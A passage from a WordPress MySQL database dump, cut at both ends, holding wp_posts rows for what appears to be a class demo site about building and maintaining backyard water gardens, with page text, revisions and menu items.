'publish', `comment_status` varchar(20) NOT NULL default 'open', `ping_status` varchar(20) NOT NULL default 'open', `post_password` varchar(20) NOT NULL default '', `post_name` varchar(200) NOT NULL default '', `to_ping` text NOT NULL, `pinged` text NOT NULL, `post_modified` datetime NOT NULL default '0000-00-00 00:00:00', `post_modified_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `post_content_filtered` longtext NOT NULL, `post_parent` bigint(20) unsigned NOT NULL default '0', `guid` varchar(255) NOT NULL default '', `menu_order` int(11) NOT NULL default '0', `post_type` varchar(20) NOT NULL default 'post', `post_mime_type` varchar(100) NOT NULL default '', `comment_count` bigint(20) NOT NULL default '0', PRIMARY KEY (`ID`), KEY `post_name` (`post_name`), KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`), KEY `post_parent` (`post_parent`), KEY `post_author` (`post_author`) ) ENGINE=MyISAM AUTO_INCREMENT=111 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_posts` -- LOCK TABLES `wp_posts` WRITE; /*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */; INSERT INTO `wp_posts` VALUES (107,1,'2013-06-29 13:39:41','2013-06-29 17:39:41','','Home','','publish','open','open','','home-2','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/?p=107',1,'nav_menu_item','',0),(110,1,'2015-02-11 16:53:49','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2015-02-11 16:53:49','0000-00-00 00:00:00','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=110',0,'page','',0),(6,1,'2013-05-29 13:21:03','2013-05-29 17:21:03',' <a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider.jpg\"><img class=\"size-medium wp-image-65 alignleft\" title=\"A waterfall makes an attractive addition to a water garden.\" alt=\"waterfall-slider\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider-300x200.jpg\" width=\"300\" height=\"200\" /></a>\r\n\r\nBuilding a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\r\n\r\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\r\n\r\nLet\'s start with some questions you must consider:\r\n\r\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\r\n\r\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\r\n\r\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\r\n\r\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\r\n\r\n<strong>5. Will you use a preformed structure or a liner?</strong> <a href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/attachment/preformed/\" rel=\"attachment wp-att-64\"><img class=\"alignright size-full wp-image-64\" alt=\"Preformed structure\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/preformed.jpg\" width=\"297\" height=\"247\" /></a>It\'s easier to install a manufactured base, but using a liner<a href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/attachment/liner-folded/\" rel=\"attachment wp-att-63\"><img class=\"alignleft size-full wp-image-63\" alt=\"Liner\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/liner-folded.jpg\" width=\"225\" height=\"225\" /></a> will give you more control over the pond\'s shape and dimensions.\r\n\r\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\r\n\r\nGive these questions careful thought. When you\'ve made some basic decisions, <a title=\"Materials List\" href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/\">click here to proceed</a>.','Build a Water Garden','','publish','open','open','','build-a-water-garden','','','2013-06-02 14:38:21','2013-06-02 18:38:21','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=6',0,'page','',0),(7,1,'2013-05-29 13:20:11','2013-05-29 17:20:11','Building a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\n\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\n\nLet\'s start with some questions you must consider:\n\n1. What kind of water garden do you want? It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\n\n2. How big do you want it to be? The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\n\n3. Where should you place the pond? If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\n\n4. How will you keep the water clean? It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\n\n5. Will you use a preformed structure or a liner? It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\n\n6. What kinds of plants will you add? Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\n\nGive these questions careful thought. When you\'ve made some basic decisions, click here to proceed.','Build a Water Garden','','inherit','open','open','','6-revision','','','2013-05-29 13:20:11','2013-05-29 17:20:11','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-revision/',0,'revision','',0),(8,1,'2013-05-29 13:23:00','2013-05-29 17:23:00','','Materials List','','publish','open','open','','materials-list','','','2013-05-29 13:23:00','2013-05-29 17:23:00','',6,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=8',0,'page','',0),(9,1,'2013-05-29 13:22:40','2013-05-29 17:22:40','','Materials List','','inherit','open','open','','8-revision','','','2013-05-29 13:22:40','2013-05-29 17:22:40','',8,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/8-revision/',0,'revision','',0),(11,1,'2013-05-29 13:29:56','2013-05-29 17:29:56','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n<ul>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\r\n</ul>\r\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\r\n\r\n \r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','publish','open','open','','keeping-pon-water-clear','','','2013-06-26 13:17:58','2013-06-26 17:17:58','',0,'http://wpclass.thegammonpress.com/ed2goclass/?p=11',0,'post','',0),(12,1,'2013-05-29 13:29:06','2013-05-29 17:29:06','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\n\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\n\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\n<ol>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\n</ol>\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\n\n \n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\n\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','inherit','open','open','','11-revision','','','2013-05-29 13:29:06','2013-05-29 17:29:06','',11,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/11-revision/',0,'revision','',0),(13,1,'2013-05-29 13:29:56','2013-05-29 17:29:56','<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Title: Keeping Your Water Clear</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">We recently returned from a week\'s vacation to find all seven of our big koi dead, victims of a fast-growing algae bloom. The loss was troubling--some of these fish had lived in our pond for as long as eight years, and we thought of them as pets. I was determined not to lose any more koi, so I did some investigating… and I learned that algae are often to blame.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Algae steal the nutrients and oxygen that fish and plants would otherwise consume. And when the weather is warm, the problem gets worse.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Here are some effective ways to control algae:</span></span></span>\r\n\r\n<span style=\"font-size: medium; font-family: Calibri; color: #000000;\"> </span>\r\n<ol>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Provide shade around the water garden and limit fish populations to numbers that the pond can actually manage. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">In the spring, give the pond a fresh start by removing fall and winter debris. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Test your water quality regularly. Check for nitrites to ensure that fish waste is not building up to toxic levels. If it is, relocate some fish, cut down on feeding, or clean the pond. Use a water meter or water testing kit to look for dissolved oxygen. Ideally, this should be in the range of three to six milligrams per liter. </span></span></span></li>\r\n <li><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">If the water garden is low on oxygen, use bubblers, aeration devices, pumps and fountains. A pond pump circulates water around the pond and into pond filters, naturally adding oxygen, as well.</span></span></span></li>\r\n</ol>\r\n<b><span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Maintain Your Filter</span></span></span></b>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">It\'s also crucial to keep your filter clean. It\'s not hard to do: Just pull out any clumps of algae and debris, clean out the filter, and keep a good balance of bacteria in the water garden.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Actually, you probably won\'t need to clean the filter as often as you\'d think. Like win, pond filters get better with age because the bacteria are more efficient over time. But in summer and fall, when the filter becomes clogged, it\'s time for a cleaning.</span></span></span>\r\n\r\n \r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Remove the filter media and clean out the media and the filter. Use pond water, if possible, to keep the chemical composition stable. Clean until the water runs clear. Then inspect the filter, and change the parts, if the media are visibly damaged or misshapen.</span></span></span>\r\n\r\n<span style=\"font-size: medium;\"><span style=\"color: #000000;\"><span style=\"font-family: Calibri;\">Where water enters and exits the filter, debris can clog the holes. Move water through the inlets and outlets of the filter to make sure that they\'re clear. Use a gentle brush or a more powerful spray of water. </span></span></span>','Keeping Your Water Clear','','inherit','open','open','','11-revision-2','','','2013-05-29 13:29:56','2013-05-29 17:29:56','',11,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/11-revision-2/',0,'revision','',0),(14,1,'2013-05-29 13:34:16','2013-05-29 17:34:16','','Articles','','publish','open','open','','articles','','','2013-05-29 13:34:16','2013-05-29 17:34:16','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=14',0,'page','',0),(15,1,'2013-06-02 14:37:09','2013-06-02 18:37:09',' <a href=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider.jpg\"><img class=\"size-medium wp-image-65 alignleft\" title=\"A waterfall makes an attractive addition to a water garden.\" alt=\"waterfall-slider\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/waterfall-slider-300x200.jpg\" width=\"300\" height=\"200\" /></a>\n\nBuilding a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\n\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\n\nLet\'s start with some questions you must consider:\n\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\n\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\n\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\n\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\n\n<strong>5. Will you use a preformed structure or a liner?</strong> <a href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/attachment/preformed/\" rel=\"attachment wp-att-64\"><img class=\"alignright size-full wp-image-64\" alt=\"Preformed structure\" src=\"http://wpclass.thegammonpress.com/ed2goclass/wp-content/uploads/2013/05/preformed.jpg\" width=\"297\" height=\"247\" /></a>It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\n\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\n\nGive these questions careful thought. When you\'ve made some basic decisions, <a title=\"Materials List\" href=\"http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/\">click here to proceed</a>.','Build a Water Garden','','inherit','open','open','','6-autosave','','','2013-06-02 14:37:09','2013-06-02 18:37:09','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-autosave/',0,'revision','',0),(16,1,'2013-05-29 13:21:03','2013-05-29 17:21:03','Building a backyard water garden can be one of the most satisfying projects you can do around the house. Your water garden will give you years of enjoyment and will certainly increase your home\'s value when you\'re ready to sell.\r\n\r\nThis website will help you plan a water garden that will best meet your needs. Then we\'ll give you advice on how to landscape it, stock it, accessorize it, and maintain it.\r\n\r\nLet\'s start with some questions you must consider:\r\n\r\n<strong>1. What kind of water garden do you want?</strong> It can be a home for goldfish or koi, or you can limit the aquatic life to plants and flowers. Since koi love to snack, you should limit your plantings or risk having them eaten.\r\n\r\n<strong>2. How big do you want it to be?</strong> The biggest mistake people make is building a pond that\'s too small. Because koi grow quickly, you should plan a pond with a volume of at least 1,000 gallons; and at least a part should reach a depth of four to five feet. If you plan on stocking goldfish, you\'ll only need to dig down about 16\" if your pond water freezes in winter.\r\n\r\n<strong>3. Where should you place the pond?</strong> If there\'s a big enough space near the home, you\'ll be able to see the water garden year-round. Make sure that the pond won\'t receive runoff after it rains: the runoff carries chemicals and fertilizer that can kill your fish and plants. Don\'t dig too close to trees, or you\'ll be spending too much time fishing leaves and branches from the water. Want to grow water lilies? Then put the water garden in a location that gets at least four hours of direct sunlight every day.\r\n\r\n<strong>4. How will you keep the water clean?</strong> It\'s a good idea to add a pump that runs a biological filter, waterfall or fountain. In addition to keeping the water fresh, you\'ll also be able to enjoy the sound of running water.\r\n\r\n<strong>5. Will you use a preformed structure or a liner?</strong> It\'s easier to install a manufactured base, but using a liner will give you more control over the pond\'s shape and dimensions.\r\n\r\n<strong>6. What kinds of plants will you add?</strong> Think about including water hyacinth, parrots feather, and anacharis: They\'ll eat up the nutrients that would otherwise attract algae.\r\n\r\nGive these questions careful thought. When you\'ve made some basic decisions, click here to proceed.','Build a Water Garden','','inherit','open','open','','6-revision-2','','','2013-05-29 13:21:03','2013-05-29 17:21:03','',6,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/6-revision-2/',0,'revision','',0),(17,1,'2013-05-29 13:50:17','2013-05-29 17:50:17',' ','','','publish','open','open','','17','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/?p=17',2,'nav_menu_item','',0),(18,1,'2013-05-29 13:50:17','2013-05-29 17:50:17',' ','','','publish','open','open','','18','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',6,'http://wpclass.thegammonpress.com/ed2goclass/?p=18',4,'nav_menu_item','',0),(19,1,'2013-05-29 13:50:17','2013-05-29 17:50:17',' ','','','publish','open','open','','19','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/?p=19',19,'nav_menu_item','',0),(109,1,'2015-02-09 17:19:33','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2015-02-09 17:19:33','0000-00-00 00:00:00','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=109',0,'page','',0),(21,1,'2013-06-01 16:01:56','2013-06-01 20:01:56','<p style=\"border:1px solid black; text-align:center;\"><a href=\"http://wpclass.thegammonpress.com/ed2goclass/\">This website contains some great advice for water gardeners.</a></p>\r\n\r\n','Add Flowers & Plants','','publish','open','open','','add-flowers-plants','','','2013-06-09 14:59:02','2013-06-09 18:59:02','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=21',0,'page','',0),(22,1,'2013-06-01 16:01:56','2013-06-01 20:01:56','','Flowers & Plants','','publish','open','open','','22','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/22/',6,'nav_menu_item','',0),(23,1,'2013-06-01 16:02:31','2013-06-01 20:02:31','','Add Fish & Wildlife','','publish','open','open','','add-fish-wildlife','','','2013-06-01 16:02:31','2013-06-01 20:02:31','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=23',0,'page','',0),(24,1,'2013-06-01 16:02:31','2013-06-01 20:02:31','','Fish & Wildlife','','publish','open','open','','24','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/24/',10,'nav_menu_item','',0),(25,1,'2013-06-01 16:02:55','2013-06-01 20:02:55','','Add Features','','publish','open','open','','add-features','','','2013-06-01 16:02:55','2013-06-01 20:02:55','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=25',0,'page','',0),(26,1,'2013-06-01 16:02:55','2013-06-01 20:02:55','','Features','','publish','open','open','','26','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/26/',14,'nav_menu_item','',0),(27,1,'2013-06-01 16:03:17','2013-06-01 20:03:17','','Maintaining a Water Garden','','publish','open','open','','maintaining-a-water-garden','','','2013-06-01 16:03:17','2013-06-01 20:03:17','',0,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=27',0,'page','',0),(28,1,'2013-06-01 16:03:17','2013-06-01 20:03:17','','Maintenance','','publish','open','open','','28','','','2013-06-29 13:39:41','2013-06-29 17:39:41','',0,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/28/',18,'nav_menu_item','',0),(29,1,'2013-06-01 16:04:50','2013-06-01 20:04:50','','Waterfalls & Fountains','','publish','open','open','','waterfalls-fountains','','','2013-06-01 16:04:50','2013-06-01 20:04:50','',25,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=29',0,'page','',0),(30,1,'2013-06-01 16:04:37','2013-06-01 20:04:37','','Waterfalls & Fountains','','inherit','open','open','','29-revision','','','2013-06-01 16:04:37','2013-06-01 20:04:37','',29,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/29-revision/',0,'revision','',0),(31,1,'2013-06-01 16:06:33','2013-06-01 20:06:33','','Lighting','','publish','open','open','','lighting','','','2013-06-01 16:06:33','2013-06-01 20:06:33','',25,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=31',0,'page','',0),(32,1,'2013-06-01 16:05:15','2013-06-01 20:05:15','','Lighting','','inherit','open','open','','31-revision','','','2013-06-01 16:05:15','2013-06-01 20:05:15','',31,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/31-revision/',0,'revision','',0),(33,1,'2013-06-01 16:07:08','2013-06-01 20:07:08','','Bridges','','publish','open','open','','bridges','','','2013-06-01 16:07:08','2013-06-01 20:07:08','',25,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=33',0,'page','',0),(34,1,'2013-06-01 16:07:03','2013-06-01 20:07:03','','Bridges','','inherit','open','open','','33-revision','','','2013-06-01 16:07:03','2013-06-01 20:07:03','',33,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/33-revision/',0,'revision','',0),(35,1,'2013-06-01 16:07:50','2013-06-01 20:07:50','','Planning','','publish','open','open','','planning','','','2013-06-01 16:07:50','2013-06-01 20:07:50','',23,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=35',0,'page','',0),(36,1,'2013-06-01 16:07:40','2013-06-01 20:07:40','','Planning','','inherit','open','open','','35-revision','','','2013-06-01 16:07:40','2013-06-01 20:07:40','',35,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/35-revision/',0,'revision','',0),(37,1,'2013-06-01 16:08:30','2013-06-01 20:08:30','','Fish List','','publish','open','open','','fish-list','','','2013-06-01 16:08:30','2013-06-01 20:08:30','',23,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=37',0,'page','',0),(38,1,'2013-06-01 16:08:23','2013-06-01 20:08:23','','Fish List','','inherit','open','open','','37-revision','','','2013-06-01 16:08:23','2013-06-01 20:08:23','',37,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/37-revision/',0,'revision','',0),(39,1,'2013-06-01 16:09:09','2013-06-01 20:09:09','','Step-by-Step Guide','','publish','open','open','','step-by-step-guide','','','2013-06-01 16:09:09','2013-06-01 20:09:09','',23,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=39',0,'page','',0),(40,1,'2013-06-01 16:09:05','2013-06-01 20:09:05','','Step-by-Step Guide','','inherit','open','open','','39-revision','','','2013-06-01 16:09:05','2013-06-01 20:09:05','',39,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/39-revision/',0,'revision','',0),(41,1,'2013-06-01 16:09:49','2013-06-01 20:09:49','','Planning','','publish','open','open','','planning','','','2013-06-01 16:09:49','2013-06-01 20:09:49','',21,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=41',0,'page','',0),(42,1,'2013-06-01 16:09:43','2013-06-01 20:09:43','','Planning','','inherit','open','open','','41-revision','','','2013-06-01 16:09:43','2013-06-01 20:09:43','',41,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/41-revision/',0,'revision','',0),(43,1,'2013-06-01 16:10:17','2013-06-01 20:10:17','','Plant List','','publish','open','open','','plant-list','','','2013-06-01 16:10:17','2013-06-01 20:10:17','',21,'http://wpclass.thegammonpress.com/ed2goclass/?page_id=43',0,'page','',0),(44,1,'2013-06-01 16:10:10','2013-06-01 20:10:10','','Plant List','','inherit','open','open','','43-revision','','','2013-06-01 16:10:10','2013-06-01 20:10:10','',43,'http://wpclass.thegammonpress.com/ed2goclass/uncategorized/43-revision/',0,'revision','',0),(45,1,'2013-06-01 16:10:43','2013-06-01 20:10:43','','Step-by-Step Guide','','publish','open','open','','step-by-step-guide','','','2013-06-01 16:10:43','2013-06-01 